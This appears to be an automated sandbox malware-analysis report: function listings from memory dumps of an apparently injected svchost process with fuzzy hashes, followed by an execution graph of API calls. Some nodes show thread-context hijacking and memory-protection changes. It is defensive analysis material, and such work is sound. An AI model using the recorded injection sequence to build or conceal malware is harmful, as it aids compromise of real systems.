                                                                                                                                                                                            • Instruction ID: a450bbf77175b817d6cd4593aedf9d259c205c8fa5fd4d63dabe11ac26be1117
                                                                                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 34111C32B10B029AEF408BA4E8553B833A4F719798F481E31DA6D877A5DF78C1988780
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A04253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileType
                                                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                                                            • Instruction ID: 246a0ff26604aca0f3d645c1c7c48db34ae137f4b6f89deb22cfd7cc08da5b05
                                                                                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F71C076301783A6E7249F26A8943FA67D4F789BC8F548036DE0A53B89DE35C645CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A019E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612269784.000001F28A010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F28A010000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a010000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CallTranslator
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 3163161869-2084237596
                                                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                            • Instruction ID: a84bd54e9350fdad91b7c7543f070e2a66874b9e4e75cd39ebfb54d7f32f9bf7
                                                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                            • Instruction Fuzzy Hash: 07613536A04A869AEB219FA5D4807ED7BE0F348BC8F144225EE4917B99DF38D195CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A042330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileType
                                                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                                                            • Instruction ID: 51f29f102ecf0d146412de3dfcee2242f7aa5bea50bff70769271f5893af85f2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B51C232B0A783A1E7749E2AA4583FA67D1F3C97C8F458135DE5913B99DE39C5048F40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A0526F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                                                            • Instruction ID: 426f41aa836bfae1ed1664f4a15fb10fe9a4815b7cfd17c9f3271890bbfb661e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                                                            • Instruction Fuzzy Hash: DA418D72615A86A6EB20CF65E8443EAA7A0F798BD4F844031EE4D97798EF78C541CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A0494A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                                                            • Instruction ID: 4b779e5d1a7d644d6dac582aabadd4d990cfb6dc1e98563a42b3bbc3ae535da1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D112832615B8292EB618B15E4403A9B7E5FB88BD8F588230EE8D57B68DF3CC551CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A017356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612269784.000001F28A010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F28A010000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a010000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                                                            • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                                                                                            • API String ID: 592178966-758928094
                                                                                                                                                                                            • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                                                                            • Instruction ID: 3091a8685abe863928ac577edc42fed7ebcbf3dab3e256063506bc1c2e444290
                                                                                                                                                                                            • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                                                                            • Instruction Fuzzy Hash: AAE0BF61651B46A1DB028F61E8903E873E59B58BA4B989122D95C46355FA38D2E9C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A0173B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612269784.000001F28A010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F28A010000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a010000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                                                            • String ID: Locator'$riptor at (
                                                                                                                                                                                            • API String ID: 592178966-4215709766
                                                                                                                                                                                            • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                                                                            • Instruction ID: 45d238433ee5c2f3afc8585d143d3ab9ad63487d04556999d398ab5661241f88
                                                                                                                                                                                            • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                                                                            • Instruction Fuzzy Hash: ABE08671640B46A1DF028F21D4803F873E0E758BA4F889132CD4C46311EE3CD1E9C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A041BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 756756679-0
                                                                                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                                                            • Instruction ID: b3051725836e5a678d16d6c04318273762d93e2dc7360282720516a8b9a87901
                                                                                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 74116A35A02B8791EA44DB66A8083B963E1FB89FC5F1C8038DE4D53766DE38C4828B00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:0.8%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                            Total number of Nodes:1778
                                                                                                                                                                                            Total number of Limit Nodes:3
                                                                                                                                                                                            execution_graph 8189 23d07490268 8190 23d07490292 8189->8190 8191 23d0748d6cc __free_lconv_mon 5 API calls 8190->8191 8192 23d074902b1 8191->8192 8193 23d0748d744 __free_lconv_mon 5 API calls 8192->8193 8194 23d074902bf 8193->8194 8195 23d0748d6cc __free_lconv_mon 5 API calls 8194->8195 8199 23d074902e9 8194->8199 8196 23d074902db 8195->8196 8198 23d0748d744 __free_lconv_mon 5 API calls 8196->8198 8198->8199 8200 23d074902f2 8199->8200 8201 23d0748f60c 8199->8201 8206 23d0748f394 8201->8206 8203 23d0748f642 8204 23d0748f661 InitializeCriticalSectionAndSpinCount 8203->8204 8205 23d0748f647 8203->8205 8204->8205 8205->8199 8207 23d0748f3f1 __vcrt_InitializeCriticalSectionEx 8206->8207 8211 23d0748f3ec __vcrt_InitializeCriticalSectionEx 8206->8211 8207->8203 8208 23d0748f421 LoadLibraryExW 8209 23d0748f4f6 8208->8209 8208->8211 8209->8207 8210 23d0748f50d FreeLibrary 8209->8210 8210->8207 8211->8207 8211->8208 8212 23d0748f480 LoadLibraryExW 8211->8212 8212->8209 8212->8211 7723 23d0748f7ec 7724 23d0748f825 7723->7724 7725 23d0748f7f6 7723->7725 7725->7724 7726 23d0748f80b FreeLibrary 7725->7726 7726->7725 7727 23d074949e0 7728 23d07494a18 __GSHandlerCheckCommon 7727->7728 7729 23d07494a44 7728->7729 7731 23d07489d3c 7728->7731 7738 23d07489634 7731->7738 7733 23d07489d66 7734 23d07489634 _CreateFrameInfo 4 API calls 7733->7734 7735 23d07489d73 7734->7735 7736 23d07489634 _CreateFrameInfo 4 API calls 7735->7736 7737 23d07489d7c 7736->7737 7737->7729 7741 23d07489650 7738->7741 7740 23d0748963d 7740->7733 7742 23d0748966f __vcrt_InitializeCriticalSectionEx 7741->7742 7748 23d07489668 _invalid_parameter_noinfo __vcrt_freefls 7741->7748 7742->7748 7749 23d07489fec 7742->7749 7744 23d074896a2 _CreateFrameInfo 7745 23d074896c9 7744->7745 7746 23d07489fec _CreateFrameInfo 4 API calls 7744->7746 7744->7748 7747 23d07489fec _CreateFrameInfo 4 API calls 7745->7747 7745->7748 7746->7745 7747->7748 7748->7740 7754 23d07489dc4 7749->7754 7751 23d0748a01a 7752 23d0748a02c TlsSetValue 7751->7752 7753 23d0748a024 7751->7753 7752->7753 7753->7744 7755 23d07489ecd __vcrt_InitializeCriticalSectionEx 7754->7755 7759 23d07489e08 __vcrt_InitializeCriticalSectionEx 7754->7759 7755->7751 7756 23d07489e36 LoadLibraryExW 7757 23d07489ead 7756->7757 7756->7759 7757->7755 7758 23d07489ec4 FreeLibrary 7757->7758 7758->7755 7759->7755 7759->7756 7760 23d07489e79 LoadLibraryExW 7759->7760 7760->7757 7760->7759 8213 23d07494a60 8223 23d07488fe8 8213->8223 8215 23d07494a88 8217 23d07489634 _CreateFrameInfo 4 API calls 8218 23d07494a98 8217->8218 8219 23d07489634 _CreateFrameInfo 4 API calls 8218->8219 8220 23d07494aa1 8219->8220 8227 23d0748c6a8 8220->8227 8226 23d07489018 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8223->8226 8224 23d07489109 8224->8215 8224->8217 8225 23d074890d4 RtlUnwindEx 8225->8226 8226->8224 8226->8225 8228 23d0748ce28 _invalid_parameter_noinfo 15 API calls 8227->8228 8229 23d0748c6b1 8228->8229 7761 23d07483be0 7762 23d07483b2d 7761->7762 7763 23d07483b7d VirtualQuery 7762->7763 7764 23d07483b97 7762->7764 7765 23d07483be2 GetLastError 7762->7765 7763->7762 7763->7764 7765->7762 8230 23d0748cc64 8231 23d0748cc69 8230->8231 8232 23d0748cc7e 8230->8232 8236 23d0748cc84 8231->8236 8235 23d0748d744 __free_lconv_mon 5 API calls 8235->8232 8237 23d0748ccc6 8236->8237 8238 23d0748ccce 8236->8238 8240 23d0748d744 __free_lconv_mon 5 API calls 8237->8240 8239 23d0748d744 __free_lconv_mon 5 API calls 8238->8239 8241 23d0748ccdb 8239->8241 8240->8238 8242 23d0748d744 __free_lconv_mon 5 API calls 8241->8242 8243 23d0748cce8 8242->8243 8244 23d0748d744 __free_lconv_mon 5 API calls 8243->8244 8245 23d0748ccf5 8244->8245 8246 23d0748d744 __free_lconv_mon 5 API calls 8245->8246 8247 23d0748cd02 8246->8247 8248 23d0748d744 __free_lconv_mon 5 API calls 8247->8248 8249 23d0748cd0f 8248->8249 8250 23d0748d744 __free_lconv_mon 5 API calls 8249->8250 8251 23d0748cd1c 8250->8251 8252 23d0748d744 __free_lconv_mon 5 API calls 8251->8252 8253 23d0748cd29 8252->8253 8254 23d0748d744 __free_lconv_mon 5 API calls 8253->8254 8255 23d0748cd39 8254->8255 8256 23d0748d744 __free_lconv_mon 5 API calls 8255->8256 8257 23d0748cd49 8256->8257 8262 23d0748cb34 8257->8262 8259 23d0748cd5e 8266 23d0748caac 8259->8266 8261 23d0748cc76 8261->8235 8263 23d0748cb50 8262->8263 8264 23d0748d744 __free_lconv_mon 5 API calls 8263->8264 8265 23d0748cb80 8263->8265 8264->8265 8265->8259 8267 23d0748cac8 8266->8267 8268 23d0748cd7c Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8267->8268 8269 23d0748cad6 8268->8269 8269->8261 8855 23d0748c0e4 8856 23d0748c0f9 8855->8856 8857 23d0748c0fd 8855->8857 8858 23d0748ec90 37 API calls 8857->8858 8859 23d0748c102 8858->8859 8870 23d0748f1ec GetEnvironmentStringsW 8859->8870 8862 23d0748c11b 8886 23d0748c158 8862->8886 8863 23d0748c10f 8864 23d0748d744 __free_lconv_mon 5 API calls 8863->8864 8864->8856 8867 23d0748d744 __free_lconv_mon 5 API calls 8868 23d0748c142 8867->8868 8869 23d0748d744 __free_lconv_mon 5 API calls 8868->8869 8869->8856 8871 23d0748c107 8870->8871 8872 23d0748f21c 8870->8872 8871->8862 8871->8863 8873 23d0748f274 FreeEnvironmentStringsW 8872->8873 8874 23d0748ca0c 5 API calls 8872->8874 8873->8871 8875 23d0748f287 8874->8875 8876 23d0748f28f 8875->8876 8879 23d0748f298 8875->8879 8877 23d0748d744 __free_lconv_mon 5 API calls 8876->8877 8878 23d0748f296 8877->8878 8878->8873 8880 23d0748f2c9 8879->8880 8881 23d0748f2bf 8879->8881 8883 23d0748d744 __free_lconv_mon 5 API calls 8880->8883 8882 23d0748d744 __free_lconv_mon 5 API calls 8881->8882 8884 23d0748f2c7 FreeEnvironmentStringsW 8882->8884 8883->8884 8884->8871 8887 23d0748c17d 8886->8887 8888 23d0748d6cc __free_lconv_mon 5 API calls 8887->8888 8898 23d0748c1b3 8888->8898 8889 23d0748d744 __free_lconv_mon 5 API calls 8891 23d0748c123 8889->8891 8890 23d0748c22e 8892 23d0748d744 __free_lconv_mon 5 API calls 8890->8892 8891->8867 8892->8891 8893 23d0748d6cc __free_lconv_mon 5 API calls 8893->8898 8894 23d0748c21d 8903 23d0748c268 8894->8903 8895 23d0748c6e8 __std_exception_copy 18 API calls 8895->8898 8898->8890 8898->8893 8898->8894 8898->8895 8899 23d0748c253 8898->8899 8901 23d0748d744 __free_lconv_mon 5 API calls 8898->8901 8902 23d0748c1bb 8898->8902 8900 23d0748d744 __free_lconv_mon 5 API calls 8900->8902 8901->8898 8902->8889 8904 23d0748c26d 8903->8904 8908 23d0748c225 8903->8908 8905 23d0748c296 8904->8905 8906 23d0748d744 __free_lconv_mon 5 API calls 8904->8906 8907 23d0748d744 __free_lconv_mon 5 API calls 8905->8907 8906->8904 8907->8908 8908->8900 9069 23d0748ad78 9070 23d0748ada5 __except_validate_context_record 9069->9070 9071 23d07489634 _CreateFrameInfo 4 API calls 9070->9071 9072 23d0748adaa 9071->9072 9074 23d0748ae92 9072->9074 9077 23d0748ae04 9072->9077 9084 23d0748ae58 9072->9084 9073 23d0748af00 9073->9084 9111 23d0748a544 9073->9111 9080 23d0748aeb1 9074->9080 9105 23d07489ce4 9074->9105 9076 23d0748ae7f 9098 23d074898e0 9076->9098 9077->9076 9083 23d0748ae26 __GetCurrentState 9077->9083 9077->9084 9080->9073 9080->9084 9108 23d07489cf8 9080->9108 9081 23d0748afa9 9083->9081 9086 23d0748b288 9083->9086 9087 23d07489ce4 Is_bad_exception_allowed 4 API calls 9086->9087 9088 23d0748b2b7 __GetCurrentState 9087->9088 9089 23d07489634 _CreateFrameInfo 4 API calls 9088->9089 9096 23d0748b2d4 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9089->9096 9090 23d0748b3cb 9091 23d07489634 _CreateFrameInfo 4 API calls 9090->9091 9092 23d0748b3d0 9091->9092 9093 23d07489634 _CreateFrameInfo 4 API calls 9092->9093 9094 23d0748b3db __FrameHandler3::GetHandlerSearchState 9092->9094 9093->9094 9094->9084 9095 23d07489ce4 LoadLibraryExW LoadLibraryExW FreeLibrary TlsSetValue Is_bad_exception_allowed 9095->9096 9096->9090 9096->9094 9096->9095 9097 23d07489d0c __FrameHandler3::FrameUnwindToEmptyState 4 API calls 9096->9097 9097->9096 9168 23d07489944 9098->9168 9100 23d074898ff __FrameHandler3::FrameUnwindToEmptyState 9172 23d07489850 9100->9172 9103 23d0748b288 __FrameHandler3::FrameUnwindToEmptyState 4 API calls 9104 23d07489934 9103->9104 9104->9084 9106 23d07489634 _CreateFrameInfo 4 API calls 9105->9106 9107 23d07489ced 9106->9107 9107->9080 9109 23d07489634 _CreateFrameInfo 4 API calls 9108->9109 9110 23d07489d01 9109->9110 9110->9073 9176 23d0748b414 9111->9176 9113 23d0748aa12 9114 23d0748a963 9114->9113 9157 23d0748a961 9114->9157 9229 23d0748aa1c 9114->9229 9115 23d0748a68b 9115->9114 9150 23d0748a6c3 9115->9150 9116 23d07489634 _CreateFrameInfo 4 API calls 9119 23d0748a9a5 9116->9119 9119->9113 9122 23d07487940 _log10_special 4 API calls 9119->9122 9120 23d07489634 _CreateFrameInfo 4 API calls 9121 23d0748a5f2 9120->9121 9121->9119 9124 23d07489634 _CreateFrameInfo 4 API calls 9121->9124 9125 23d0748a9b8 9122->9125 9123 23d0748a894 9126 23d07489ce4 Is_bad_exception_allowed 4 API calls 9123->9126 9127 23d0748a8b1 9123->9127 9123->9157 9129 23d0748a602 9124->9129 9125->9084 9126->9127 9130 23d0748a8d3 9127->9130 9127->9157 9222 23d074898b4 9127->9222 9131 23d07489634 _CreateFrameInfo 4 API calls 9129->9131 9132 23d0748a9f5 9130->9132 9133 23d0748a8e9 9130->9133 9130->9157 9134 23d0748a60b 9131->9134 9136 23d07489634 _CreateFrameInfo 4 API calls 9132->9136 9135 23d0748a8f4 9133->9135 9138 23d07489ce4 Is_bad_exception_allowed 4 API calls 9133->9138 9187 23d07489d24 9134->9187 9142 23d0748b4ac 4 API calls 9135->9142 9139 23d0748a9fb 9136->9139 9138->9135 9141 23d07489634 _CreateFrameInfo 4 API calls 9139->9141 9144 23d0748aa04 9141->9144 9145 23d0748a90b 9142->9145 9143 23d07489cf8 LoadLibraryExW LoadLibraryExW FreeLibrary TlsSetValue 9143->9150 9147 23d0748c6a8 15 API calls 9144->9147 9149 23d07489944 __GetUnwindTryBlock RtlLookupFunctionEntry 9145->9149 9145->9157 9146 23d07489634 _CreateFrameInfo 4 API calls 9148 23d0748a64d 9146->9148 9147->9113 9148->9115 9152 23d07489634 _CreateFrameInfo 4 API calls 9148->9152 9151 23d0748a925 9149->9151 9150->9123 9150->9143 9201 23d0748ac38 9150->9201 9215 23d0748a470 9150->9215 9226 23d07489b50 RtlUnwindEx 9151->9226 9154 23d0748a659 9152->9154 9155 23d07489634 _CreateFrameInfo 4 API calls 9154->9155 9158 23d0748a662 9155->9158 9157->9116 9190 23d0748b4ac 9158->9190 9162 23d0748a676 9197 23d0748b59c 9162->9197 9164 23d0748a9ef 9165 23d0748c6a8 15 API calls 9164->9165 9165->9132 9166 23d0748a67e __CxxCallCatchBlock std::bad_alloc::bad_alloc 9166->9164 9167 23d074894a0 Concurrency::cancel_current_task 2 API calls 9166->9167 9167->9164 9171 23d07489972 __FrameHandler3::FrameUnwindToEmptyState 9168->9171 9169 23d074899e2 9169->9100 9170 23d0748999e RtlLookupFunctionEntry 9170->9171 9171->9169 9171->9170 9175 23d0748986e 9172->9175 9173 23d07489634 _CreateFrameInfo 4 API calls 9173->9175 9174 23d0748989b 9174->9103 9175->9173 9175->9174 9177 23d0748b439 __FrameHandler3::FrameUnwindToEmptyState 9176->9177 9178 23d07489944 __GetUnwindTryBlock RtlLookupFunctionEntry 9177->9178 9179 23d0748b44e 9178->9179 9241 23d0748a0cc 9179->9241 9182 23d0748b460 __FrameHandler3::GetHandlerSearchState 9244 23d0748a104 9182->9244 9183 23d0748b483 9184 23d0748a0cc __GetUnwindTryBlock RtlLookupFunctionEntry 9183->9184 9185 23d0748a5a6 9184->9185 9185->9113 9185->9115 9185->9120 9188 23d07489634 _CreateFrameInfo 4 API calls 9187->9188 9189 23d07489d32 9188->9189 9189->9113 9189->9146 9191 23d0748b593 9190->9191 9195 23d0748b4d7 9190->9195 9192 23d0748a672 9192->9115 9192->9162 9193 23d07489cf8 LoadLibraryExW LoadLibraryExW FreeLibrary TlsSetValue 9193->9195 9194 23d07489ce4 Is_bad_exception_allowed 4 API calls 9194->9195 9195->9192 9195->9193 9195->9194 9196 23d0748ac38 4 API calls 9195->9196 9196->9195 9198 23d0748b609 9197->9198 9199 23d0748b5b9 Is_bad_exception_allowed 9197->9199 9198->9166 9199->9198 9200 23d07489ce4 LoadLibraryExW LoadLibraryExW FreeLibrary TlsSetValue Is_bad_exception_allowed 9199->9200 9200->9199 9202 23d0748ac65 9201->9202 9214 23d0748acf4 9201->9214 9203 23d07489ce4 Is_bad_exception_allowed 4 API calls 9202->9203 9204 23d0748ac6e 9203->9204 9205 23d07489ce4 Is_bad_exception_allowed 4 API calls 9204->9205 9206 23d0748ac87 9204->9206 9204->9214 9205->9206 9207 23d0748acb3 9206->9207 9208 23d07489ce4 Is_bad_exception_allowed 4 API calls 9206->9208 9206->9214 9209 23d07489cf8 4 API calls 9207->9209 9208->9207 9210 23d0748acc7 9209->9210 9211 23d07489ce4 Is_bad_exception_allowed 4 API calls 9210->9211 9213 23d0748ace0 9210->9213 9210->9214 9211->9213 9212 23d07489cf8 4 API calls 9212->9214 9213->9212 9214->9150 9216 23d07489944 __GetUnwindTryBlock RtlLookupFunctionEntry 9215->9216 9217 23d0748a4ad 9216->9217 9218 23d07489ce4 Is_bad_exception_allowed 4 API calls 9217->9218 9219 23d0748a4e5 9218->9219 9220 23d07489b50 5 API calls 9219->9220 9221 23d0748a529 9220->9221 9221->9150 9223 23d074898c8 __FrameHandler3::FrameUnwindToEmptyState 9222->9223 9224 23d07489850 __FrameHandler3::FrameUnwindToEmptyState 4 API calls 9223->9224 9225 23d074898d2 9224->9225 9225->9130 9227 23d07487940 _log10_special 4 API calls 9226->9227 9228 23d07489c4a 9227->9228 9228->9157 9230 23d0748aa52 9229->9230 9235 23d0748aac0 9229->9235 9231 23d07489634 _CreateFrameInfo 4 API calls 9230->9231 9232 23d0748aa57 9231->9232 9233 23d0748aa66 EncodePointer 9232->9233 9240 23d0748aabc 9232->9240 9234 23d07489634 _CreateFrameInfo 4 API calls 9233->9234 9236 23d0748aa76 9234->9236 9235->9157 9236->9240 9247 23d074897fc 9236->9247 9238 23d07489ce4 LoadLibraryExW LoadLibraryExW FreeLibrary TlsSetValue Is_bad_exception_allowed 9238->9240 9239 23d0748a470 10 API calls 9239->9240 9240->9235 9240->9238 9240->9239 9242 23d07489944 __GetUnwindTryBlock RtlLookupFunctionEntry 9241->9242 9243 23d0748a0df 9242->9243 9243->9182 9243->9183 9245 23d07489944 __GetUnwindTryBlock RtlLookupFunctionEntry 9244->9245 9246 23d0748a11e 9245->9246 9246->9185 9248 23d07489634 _CreateFrameInfo 4 API calls 9247->9248 9249 23d07489828 9248->9249 9249->9240 8909 23d0748f2fc 8910 23d0748f31e 8909->8910 8913 23d0748f33b 8909->8913 8911 23d0748f32c 8910->8911 8910->8913 8912 23d0748d6ac __free_lconv_mon 5 API calls 8911->8912 8915 23d0748f331 8912->8915 8916 23d07491af4 8913->8916 8917 23d07491b09 8916->8917 8918 23d07491b13 8916->8918 8919 23d0748ca0c 5 API calls 8917->8919 8920 23d07491b18 8918->8920 8926 23d07491b1f __free_lconv_mon 8918->8926 8924 23d07491b11 8919->8924 8923 23d0748d744 __free_lconv_mon 5 API calls 8920->8923 8921 23d07491b25 8925 23d0748d6ac __free_lconv_mon 5 API calls 8921->8925 8922 23d07491b52 HeapReAlloc 8922->8924 8922->8926 8923->8924 8924->8915 8925->8924 8926->8921 8926->8922 7766 23d074827fc 7768 23d07482842 7766->7768 7767 23d074828a8 7768->7767 7770 23d07483844 7768->7770 7771 23d07483866 7770->7771 7772 23d07483851 StrCmpNIW 7770->7772 7771->7768 7772->7771 8927 23d074906f0 8930 23d07490674 8927->8930 8929 23d07490719 8931 23d07490692 8930->8931 8932 23d074906cb 8931->8932 8933 23d07490acc _invalid_parameter_noinfo 5 API calls 8931->8933 8932->8929 8933->8931 8934 23d07485cf0 8935 23d07485cfd 8934->8935 8936 23d07485d09 8935->8936 8941 23d07485e1a 8935->8941 8937 23d07485d8d 8936->8937 8938 23d07485d66 SetThreadContext 8936->8938 8938->8937 8939 23d07485efe 8942 23d07485f1e 8939->8942 8950 23d074843e0 8939->8950 8940 23d07485e41 VirtualProtect FlushInstructionCache 8940->8941 8941->8939 8941->8940 8954 23d07484df0 GetCurrentProcess 8942->8954 8945 23d07485f77 8948 23d07487940 _log10_special 4 API calls 8945->8948 8946 23d07485f37 ResumeThread 8947 23d07485f23 8946->8947 8947->8945 8947->8946 8949 23d07485fbf 8948->8949 8952 23d074843fc 8950->8952 8951 23d0748445f 8951->8942 